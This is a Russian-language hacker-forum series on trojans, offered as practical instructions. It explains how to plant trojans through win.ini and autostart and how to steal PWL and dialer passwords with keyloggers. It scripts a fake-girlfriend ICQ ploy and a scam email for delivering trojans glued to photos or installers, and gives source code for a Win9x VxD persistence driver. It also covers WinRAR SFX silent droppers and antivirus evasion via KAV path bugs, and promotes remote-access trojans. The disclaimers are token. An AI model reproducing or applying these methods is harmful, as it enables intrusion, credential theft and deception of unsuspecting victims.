Про трояны. Пример написания трояна
Еще один способ. Добычи PWL состоит в подсовывание объекту трояна. Но сначало следует заметить вот что:
Статья 273.
Создание, использование и распространение вредоносных программ для ЭВМ
1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет.
Теперь рассмотрим моменты, в каких случаях следует использовать трояны:
1) Вы залезли на компьютер жертвы, скопировали PWL и system.ini. Но все равно не можете его взломать. Такое иногда случается. Ну, например слишком большой пароль на PWL, который придется взламывать очень и очень долго.
2) Вы все скопировали, как надо открыли файл PWL, а там нужного вам пароля не оказалось.
3) У жертвы вообще нет шаров, и придется впаривать ему троян другим способом.
Теперь рассмотрим попарядку как быть в каждом случае.
1) Итак мы заходим на компьютер и просто копируем, троян на чужую машину. Ну, например, в папку windows или еще дальше windows\systems. Потом берем и открываем файл win.ini, он лежит в папке windows\. В самом начале этого файла мы увидим строчки load= и run= , и прописываем там полный путь к трояну. Например, если мы поместили троян в папку window и он имеет название, скажем bad.exe (лучше конечно, другое давать имя). Тогда будет load=c:\windows\bad.exe или run=c:\windows\bad.exe. Как вам больше нравится
Можно поступить проще запихнуть троян в автозагрузку и ничего нигде не надо прописывать, но тогда ссылка на него появится в пуск-программы-автозагрузка, что не желательно. (Но если придать файлу трояна статус СКРЫТЫЙ, то в Автозагрузке ничего не отобразиться). Какие трояны следует использовать в этом случае. Те, которые высылают расшифровывают PWL, а также файлы программ дозвоньщиков, в которых хранятся пароли. В зависимости от троянов пароль может высылаться на мыло или сохранять свои результаты на диске жертвы в виде лог файла или чего-то похожего.
Я приведу в пример такого трояна MOscow State trojan. Был опробован лично мною в целях опыта, с моим другом. С его согласия конечно. Свои функции выполнил, кроме одной, но она не имеет большого значения. Следует сказать, что есть такой троян с названием Наеби соседа. Он отсылает пароли не только вам на мыло, но и на мыло его создателя.
2) В этом случае сперва попробуйте полазить по компьютеру, потому что некоторые пользователи не сохраняют пароли в PWL, а просто хранят его на диске в открытом виде. Чаще всего или на Рабочем столе или в Моих документах. Еще пароли могут скрываться в файлах *.scp. Некоторые провайдеры в разделах в помощь пользователю пишут, как подключаться через скрипт, и некоторые конструкции скриптов включают пароли и логины в открытом виде. Так что обращайте внимание на такие файлы. Они могут находится тут *:\Program Files\Accessories, а могут и где-то еще.
Нету? Ну да ладно. Нам понадобятся так называемые тряны keyloggerы они отлавливают комбинацию вводимых цифр и букв нажатых на клавиатуре. И также либо отсылают на мыло, либо хранят на диске жертвы. Способ установки такой же.
3) Самый интересный способ. Лучше всего впаривать трояны в виде картинок. Т.е вы просто склеиваете троян с картинокй и даете расширение картинка.jpg .еxe(много пробелов) Это дело можно послать по асе, так как она не покажет расширение exe окошко у нее слишком маленькое не поместится, или по почте. Здесь уже включаем фантазию и думаем как это сделать чтоб юзверь открыл этот файл.
Подробно.Итак, что мы имеем. Предположим такую ситуацию. Вариант номер 1. Просканили Мы диапазон, а там всего там мало некуда не залезешь. Ужас просто. Попробуем сделать так посмотрите внимательно на имена компьютеров. Ну и наметьте себе имя что-то типа Natasha или Valy, не пропускайте также имена Timur или похожие. Может нам придется побыть девушкой или наоборот парнем. Вобщем пол сменить. Ну, так ип мы знаем. Берем программу, которая сканируют порты на наличие аси {--забыл как называется--} самые популярные 1080, 5120, 4000. Ну, как нашли? Если нет, ищем другого. Если удачно то высветится номерок. Смотрим кто это, главное чтобы было достаточно информации. Т.е прописано мыло и так далее. Если информация скудна, то лучше ищите другого. Ну, если эти этапы пройдены удачно, едем дальше. Видим, что это девушка, возраст колеблется от 15 до 28, просто если больше, то вероятность что она замужем возрастает. Мы быстренько меняем информацию на подходящую, т.е. соответственно на возраст от 16 до 30. Лучше даже заведите отдельную асю и пропишите ее своими виртуальными данными. Пропишите похожие увлечения, только не переусердствуете, а то получится уж слишком много совпадений. Все готово первый этап пройден. Стучимся в асю к жертве и начинаем разговаривать. Обязательно восхвалите, ник пользователя и скажите, что у нее или него хороший вкус. Дальше стандартные вопросы и слова. Наконец спросите имя пользователя. И скажите, что оно вам нравится. Только не будьте ангелочком, это настораживает. Ну и далее долгожданный вопрос У тебя есть фотка? Неважно, что вам ответят. Главное чтобы у вас спросили, есть ли она у вас? Конечно да. Отсылаем заранее заготовленную фотографию, склеенную с трояном. Естественно лучше высылать не свою фотографию, а взятую, например с сайта знакомств чужую. И постарайтесь сделать так чтобы пользователь после ее отправки у себя нажал на кнопочку открыть, чтобы в этом быть уверенным нужно довести клиента до кондиции. Т.е. чтобы он хотел побыстрее на вас взглянуть. Ну и после для проверки, чтобы узнать посмотрели все-таки на вас или нет. Задайте вопрос типа "Как думаешь, в каком клубе сделана эта фотография?" или что-то типа того. А лучше послать фотографию на которой изображены два человека. Тогда вас по любому спросят, который из них вы? Да и не посылайте фотографии размером 10Х10 склеенным с трояном размера 200kb. Заметить элементарно, такое попустительство с вашей стороны.
Если вам такой способ непонраву можно сделать подругому.
Вариант 2.
Заведите себе отдельное мыло, Например admini@mail.ru. Здесь опять воля вашей фантазии и пошлите письмо. С примерно таким содержанием.
Здрасте.........
Мы производим тестирование программы с помощью, которой вы можете зарабатывать деньги в интернете просто
находясь в нем. Она фиксирует время вашего нахождения в интернете,...... и так далее. Что придет на ум.
Всего хорошего.
И будет лучше, если вы не просто так вышлете троян, а, например склеете ее с какой-то прогой. Т.е найдите программу, которая для установки требует другие файлы. Например, при инсталяции извлекает из какого-то архива файлы. Возьмите и удалите этот архив. И посмотрите как себе тогда поведет установочный файл. Если программа не может установиться без этого архива чудесно. Только продумайте этот момент, а то как-то некрасиво будет, если выскочит окошко сейчас будет установлен Flash, а только потом выскочит ошибка при копировании.
Продумали? Смело клейте с троей и вперед.Только один важный момент отсылайте такие письма через специальные службы и пользуйтесь специальными программами, которые сотрут ваш ип из заголовка письма. Т.е. Не забывайте об анонимности, а то вас могут легко найти.{А вот про то, как надо отсылать анонимно я точно не помню, где-то видел хорошую статью на эту тему, а где забыл} Подумайте о безопасности. Заведите для паролей отдельную почту. Только для этого!!!!!. Всегда. Запомните, всегда заходите на неё через анонимный прокси. Ну, вот вроде и все.
СТАТЬЯ ОПУБЛИКОВАНА В КАЧЕСТВЕ ОЗНАКОМЛЕНИЯ И САМОЗАШИТЫ ! Я И АДМИНИСТРАЦИЯ НИКАКОЙ
ОТВЕТСТВЕННОСТИ НЕ НЕСЁТ !
Маскировка - Способ № 1
В этой статье я расскажу и покажу на примере как можно замаскировать вашего троянца так, что не один не далёкий пользователь компьютера не сможет найти то место в системе, откуда он запускается.
И так преступим.Как известно большинство троянцев прописывает себя в реестре, в разделе автозагрузки(HKLM\Software\Microsoft\Windows\CurrentVersion\Run). Но в наше время это уже не является надёжным методом запуска троянца. Как же быть в такой ситуации? Выход напрашивается сам собой,нужно сделать такой метод загрузки,который ещё не известен пользователям, да и который не бросался бы в глаза. Одним из таких способов является написание некой программы(читай драйвера), который бы ,например, прописывал нашего троянца в реестре каждый раз при загрузке. Такой программой является драйвер устройства в Windows. Я рассмотрю драйвер только для Win9x ввиду того, что большинство пользователей в настоящее время использует системы именно этого класса. И так в чём же весь смысл. А вот в чём :прописав драйвер один раз в реестре,при установке троянца на компьютер жертвы, (в специальном месте,о котором и не каждый-то продвинутый пользователь знает, не говоря уже о рядовом) мы обеспечим запуск нашего троянца каждый раз после перезагрузки системы(точнее мы просто будем прописывать его в ключе авто запуска в реестре). И так вот исходные текста нашего драйвера.
ctrlddb.asm
.386p
;******************************************************************************
; I N C L U D E S
;******************************************************************************
WIN40COMPAT equ 1
include vmm.inc
;============================================================================
; V I R T U A L D E V I C E D E C L A R A T I O N
;============================================================================
DECLARE_VIRTUAL_DEVICE CTRL, 1, 0, ControlProc, UNDEFINED_DEVICE_ID, \
UNDEFINED_INIT_ORDER
VxD_LOCKED_CODE_SEG
;===========================================================================
;
; PROCEDURE: ControlProc
;
; DESCRIPTION:
; Device control procedure for the CTRL VxD
;
; ENTRY:
; EAX = Control call ID
;
; EXIT:
; If carry clear then
; Successful
; else
; Control call failed
;
; USES:
; EAX, EBX, ECX, EDX, ESI, EDI, Flags
;
;============================================================================
BeginProc ControlProc
Control_Dispatch SYS_VM_INIT, _OnSysVMInit, cCall,
clc
ret
EndProc ControlProc
VxD_LOCKED_CODE_ENDS
END
ctrl.c
#define WIN40COMAPT
#include
#undef WANTVXDWRAPS
#include
#include
#include "config.h"
BOOL OnSysVMInit(DWORD vh)
{
VMMHKEY key;
char data[MAXPATH];
ULONG datasize;
ULONG i;
if (VMM_RegCreateKey(HKEY_LOCAL_MACHINE ,VXDDATAPATH,&key)!=ERROR_SUCCESS)
return TRUE;
for (i=0;i data[i]=0;
datasize=MAXPATH;
if (VMM_RegQueryValueEx(key,VALUENAME,NULL,NULL,&data,&datasize)!=ERROR_SUCCESS)
{
VMM_RegCloseKey(key);
return TRUE;
}
VMM_RegCloseKey(key);
if (VMM_RegCreateKey(HKEY_LOCAL_MACHINE ,AUTORUNPATH,&key)!=ERROR_SUCCESS)
return TRUE;
if (VMM_RegSetValueEx(key,APPNAME,NULL,REG_SZ,&data,datasize)!=ERROR_SUCCESS)
{
// No Freeing needed
}
VMM_RegCloseKey(key);
return TRUE;
}
config.h
#define APPNAME "MyTroyan"
#define VXDDATAPATH "System\\CurrentControlSet\\Services\\VxD\\forceloader"
#define VALUENAME "LoaderData"
#define MAXPATH 256
#define AUTORUNPATH "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
Остальные файлы необхадимые для зборки вы можете найти в прилогающемся архиве,в прочем как и уже готовый драйвер.Итак рассмотрим по-подробнее зачем ,что нужно.Файл ctrlddb.asm это всего лишь декларация нашего драйвера через макросы(доступны только для ассемблера),он отвечает всего на одно событие-SysVMInit,это событие посылается всем драйверам ,которые его обрабатывают,когда системная виртуальная машина(в ней работают все Win32 приложения)готова к работе,в это время нам доступен и реестер и всё остальное.Именно в этот момент мы и прописываем нашего троянца в реестер(если пользователь удалил на него ссылку),Строка "#define WIN40COMPAT" говорит компилятору ,что наш драйвер должен быть совместим с Windows95,так как в WIndows98 есть дополнительны сервисы,которых нет в 95.Далее идут необходимые команды подключения заголовков и затем функция,которая реагирует на событие(SysVMInit),в этой функции и делается вся работа.Как вы наверное уже заметили имена всех функций начинаются с VMM_ ,на самом деле это вызовы соответствующих сервисов менеджера виртуальных машин,но для нас это не важно.Синтсксис у этих функций такой же как и у соответствующих функций из Win32 API так,что останавливаться на нём не будем,разберём лучше ,что какая сторка делает. В начале идёт декларация переменных,затем с помощью VMM_RegCreateKey мы открываем подключ в ключе HKEY_LOCAL_MACHINE (может быть любой другой например HKEY_CURRENT_USER)VXDDATAPATH -это адресс подключа где находиться строка ,которую драйверу необходимо прописать в реестре. Далее с помощью VMM_RegQueryValueEx мы читаем переменную из этого ключа с именем VALUENAME (предполагается,что это строкавой параметр,и проверка на это не делается),затем мы закрываем ключ и открываем ключ куда нужно записать то,что му прочитали(имя этого подключа определено в AUTORUNPATH) .Далее мы просто вписываем ранее прочитаное значение в переменную определённую в APPNAME и закрываем ключ.Всё наш троянец в реестре(в AUTORUNPATH появится строка вида "MyTroyan c:\windows\system\troyan.exe" ,где MyTroyan это имя переменной).Обратите внимание,что при любой ошибке функция всёравно возвращает TRUE ,это нужно делать потому,что если мы вернём FALSE система подумает ,что что-то нетак и перезагрузит машину.
Ну вот в принципе и всё,что я хотел рассказать.По всем вопросам и замечанием можете писать мне .
И в заключении традиционно:За использование материала изложенного в данной статье автор ответственности не несёт,используйте на свой страх и риск.
Архив с иходниками прилагаю,вот он.
P.S.:Собрать исходники можно установив Windows98 DDK(Device Development Kit).
СТАТЬЯ :
Трояны ... ПРОДОЛЖЕНИЕ НОМЕР 2 !!!
СТАТЬЯ ОПУБЛИКОВАНА В КАЧЕСТВЕ ОЗНАКОМЛЕНИЯ И САМОЗАШИТЫ ! Я И АДМИНИСТРАЦИЯ НИКАКОЙ
ОТВЕТСТВЕННОСТИ НЕ НЕСЁТ !
Маскировка - Способ № 2
Что если под рукой склеивальщика нету, а надо срочно? Качать! А если ссылки забиты, да и новый антитварь детектит? Вот тут то и пригодится наш любимый WinRar.
Всё очень просто, но перед переходом к делу перечислю достоинства и недостатки данного метода склеивания.
Плюсы [+++] 1. Никогда антитварь не будет считать этот файл вирусом
2. Доступность метода
3. Сжатие файлов
4. Лёгкая модификация уже добавленных файлов
Минусы [- - -]
1. Жертва может просмотреть файлы
2. Недостаточная быстрота работы
3. Антитвари шарют в архивах
Для большей маскировки я советую вам скачать программу MicroAngelo 98
(ftp://ftp.mgul.ac.ru/pub/Win/Graph/Icon/eds_mike98.zip), которая позволит заменить стандартный значок на значок картинки.
Приступим.
Быстренько выбираем в проводнике наши отправляемые файлы и из контекстного меню создаём SFX-архив со следующими параметрами:
Unpuck to temprorary folder
Hide all
Overwrite all files
После создания, archivename.exe нужно открыть в винраре и перейти в режим редактирования комментария. Все необходимо свести к виду
;The comment below contains SFX script commands
Setup=file1
Setup=file2
Setup=file3
TempMode
Silent=1
Overwrite=1
где file1, file2, file3 то, что надо запустить. Хочу обратить ваше внимание что сервер троя должен быть настроен на НЕпоказывание фиктивного сообщения(типа Программа вызвала ошибку), а то это вызовет подозрение. В заключение можете поменять иконку прогой которую я указал выше и смело впаривать врагу.
СТАТЬЯ :
Трояны ... ПРОДОЛЖЕНИЕ НОМЕР 3 !!!
СТАТЬЯ ОПУБЛИКОВАНА В КАЧЕСТВЕ ОЗНАКОМЛЕНИЯ И САМОЗАШИТЫ ! Я И АДМИНИСТРАЦИЯ НИКАКОЙ ОТВЕТСТВЕННОСТИ НЕ НЕСЁТ !
Маскировка - Способ № 3
Этот метод маскировки действует только на NT
А началось все с того, что наш уважаемый соотечественник ZARAZA из Нижнего Новгорода сообщает об обнаружении уязвимостей в популярном антивирусе KAV (он же Kaspersky Antivirus). Две уязвимости связаны с ошибками при обработке слишком длинного имени пути файла. NTFS позволяет создать путь неограниченной длины, однако Windows API не поддерживает длину пути более 256 байт. Для предотвращения проверки длинного имени пути API, можно использовать префикс \\?\ в имени файла (это документированная особенность Win API). Было обнаружено, что KAV при обработке длины пути, тем не менее, либо рушится, либо зависает с поглощением всех ресурсов процессора. Также можно удалённо завесить сервер с установленным серверным KAV, однако для этого необходим доступ с возможностью записи в директорию). Вторая уязвимость связана с тем, что при создании файла с подобным длинным путём может предотвратить его обнаружение KAV (а файл может оказаться вирусом или трояном, например). Третья уязвимость связана с тем, что при создании NTFS
-файла c именем специального зарезервированного устройства (например, aux.vbs или aux.com) также приведёт к тому, что его невозможно будет идентифицировать при помощи KAV. Проверялось на версии KAV 4.0.9.0 в ОС Windows NT 4.0 и Windows 2000.
Так что юзайте этот баг наздоровье.
Anti-Lamer BackDoor
Троян наш, полностью на русском. Позволяет практически полностью управлять чужим компьютером.
Довольно часто обновляеться сервак и некоторое время их не палит каспер. Из плюсов еще отмечу что сам сервак весит относительно мало для таких троев 178к (почти на 100 к меньше чем смерть ламера), редактор сам может склеить сервак файлом и поменять иконку на любую (есть у троя свой набор или же вы сами клеите любой).. через клиентскую часть быстро можете проверить новый чистяк.
Вещь прикольная советую всем.
Функции
Сервер: Закрыть, перезагрузить, удалить, менять настройки, всё как обычно
Сведения: Подробнейшие сведения о компе: имя юзера и компа, системные папки,язык и т.д.
Приколы: Вытаскивать CD-ROM, делать с рабочим столом всё, что хочешь, и т.д.
Мышь: Работы с мьшью - отключить, увеличить скорость и т.д.
Сообщения: или месаги, кто как называет - посылать сообщения.
Окна: работа с окнами - закрыть, скрыть, показать, отключить и т.д.
Экстра: Открыть Пуск, удалить обои, перезагрузить комп,отключить клаву, сменить дату и т.д.
Файлы: Работа с файлами. Можете покапаться в файлах жертвы.
Реестр: Работа с реестром. Изменять, создавать параметры и т.д.
Экран: Разрешения экрана, снимок экрана и "Съедание экрана (как pacman)
Клав.Шпион: слежение за нажатием клавиш.
Принтер: отпечатать текст на принтере.
Пароли: получение паролей - кэшированных и DialUp'ных.
Цвета Windows: установка цвета - рабочий стол, бэкграунд и т.д.
Писать на экране: писать текст на экране.
Тел.Соединения: Работа с телефонными соединениями.
Буфер обмена: удаление, запись в буфер и т.д.
Чат: Чат с жертвой или клиентом (другим ALB.exe)
В данный момент у трояна отсутствует офсайт, вы можете найти троян используя Раю (www.raya.ru)
Содержание zip архива
В данный архив входят 5 файлов:
ALB.exe - клиент (315 кб)
Server.exe - сервер (178 КБ)
EditSrv.exe - редактор сервера (216 кб)
Edit.Dll - для склейки файлов (13 кб)
english.reg - для английской версии (77 байт)
Прочти.htm - описание трояна
СТАТЬЯ :
Трояны ... ПРОДОЛЖЕНИЕ НОМЕР 5 !!!
СТАТЬЯ ОПУБЛИКОВАНА В КАЧЕСТВЕ ОЗНАКОМЛЕНИЯ И САМОЗАШИТЫ ! Я И АДМИНИСТРАЦИЯ НИКАКОЙ ОТВЕТСТВЕННОСТИ НЕ НЕСЁТ !
Lamers Death
Последняя версия трояна Lamers Death 2.6
Небезизвестный трой удаленного администрирования.
Очень сильно похож на предидущий.. правда чуть больше функций. Чем они отличаються: Сервер ламер тяжелее почти на 100к .. да и с обновлениями не так уж все хорошо. Кстати, на сегодняшний день последний "чистый" сервер палит АВП.
При попадании на комп жертвы его винда начинает "немного" не так работать.. есть функция "ухода" троя через некоторое время (при этом может с собой забрать и винду).. а так же установки пароля на сервак.
На оффсайте троя действует (правда не всегда он работает) пейджер, куда трой может высылать пароли и не только.
Тама же можете найти ФАК, помощь впаривании трояна и еще некоторые интересные утилиты, которые опишу "в следующей серии".
Возможности Lamers Death 2.6(взято с файла readme)
Множество приятных мелочей, которых нет нигде;
Приклеиваться к системным файлам для большей живучести;
Воровать Кэшированные и Диалапные пароли, а также пароли популярных звонилок EDialer и MDialer;
Присылать _новые_ пароли и другую информацию на ваш EMail, что очень удобно.
Присылать уведомления на пейджер LD (http://ldteam.org)
Уведомлять вас на ICQ, когда юзер вышел в Онлайн;
Выполнять автоапгрейд;
Скачивать и запускать файл по указанному url;
Запрещать чтение и изменение настроек без предъявления пароля;
Следить за жертвой автообновлением позиции курсора мыши и содержимого экрана;
Менять дату сервера на идентичную системным файлам Windows;
Открывать порты только в онлайне;
Автоудаляться через указанное количество дней;
Закрывать окна файрволов при обнаружении;
Закрывать окна известных антивирусов;
Фиксить АВП;
Отправлять на icq отчёты об ошибках;
Убивать, Закрывать, Показывать, Скрывать и Запрещать доступ к любому окну и процессу, менять заголовки окон;
Выполнять стандартные операции с файлами, такие как Просмотр, Копирование, Удаление, Изменение, Поиск, Скачивание, Закачивание, Запуск и Воспроизведение, а также возможность просмотра по введённой маске;
Эмитировать нажатия клавиш
Устраивать чат с жертвой
Создавать, Удалять, Изменять ключи и значения реестра;
Управлять громкостью удалённого компьютера;
Шпионить за нажатыми в оффлайне и в онлайне кнопками, сохранять архив нажатий;
Показывать количество соединений и удалённые адреса каждого отдельного пользователя;
Устраивать чат для всех пользователей, подключённых к данному серверу;
Мигать лампочками, Изменять время и дату на удалённом компьютере, Открывать введённый URL в броузере и управлять выходом из Windows;
Управлять CDROM'ом, включать/отключать сочетание Ctrl+Alt+Del, просматривать и менять содержимое Буфера обмена, Скрывать и показывать Таскбар, Трей, Часы, Рабочий стол;
Менять местами кнопки Мыши, эмулировать одиночные и двойные нажатия любой кнопкой в любом месте экрана, Следить за перемещениями курсора;
Сдирать скриншоты разного качества и размера, Следить за определённой областью экрана удалённого компьютера, Управлять питанием монитора и менять текущее разрешение;
Выводить сообщения и окна ввода всех стилей;
Собирать подробнейшую информацию о системе:
Размер и процент использования файла подкачки;
Текущее разрешение монитора;
Временная папка и папка ОС;
Производитель, модель и частота процессора;
Общее количество и процент незанятой физической памяти;
Модель сетевой карты, если таковая имеется;
Подробная информация о каждом диске системы;
Зарегистрированное имя пользователя и организация;
Список почтовых ящиков со всеми параметрами;
Также есть возможность Изменения имени файла-сервера, Пароля и Рабочего порта сервера. Ессесно присутствуют стандартные операции работы с сервером, такие как Закрытие, Удаление и Перезапуск;
Вы можете указать папку для временных и скаченных файлов, настроить по своему усмотрению Интерфейс клиента и Качество камеры;
Также клиент включает в себя утилиту Ху из (пинг, лукап) и красивый РУССКИЙ интерфейс!
И это только основные возможности данного трояна.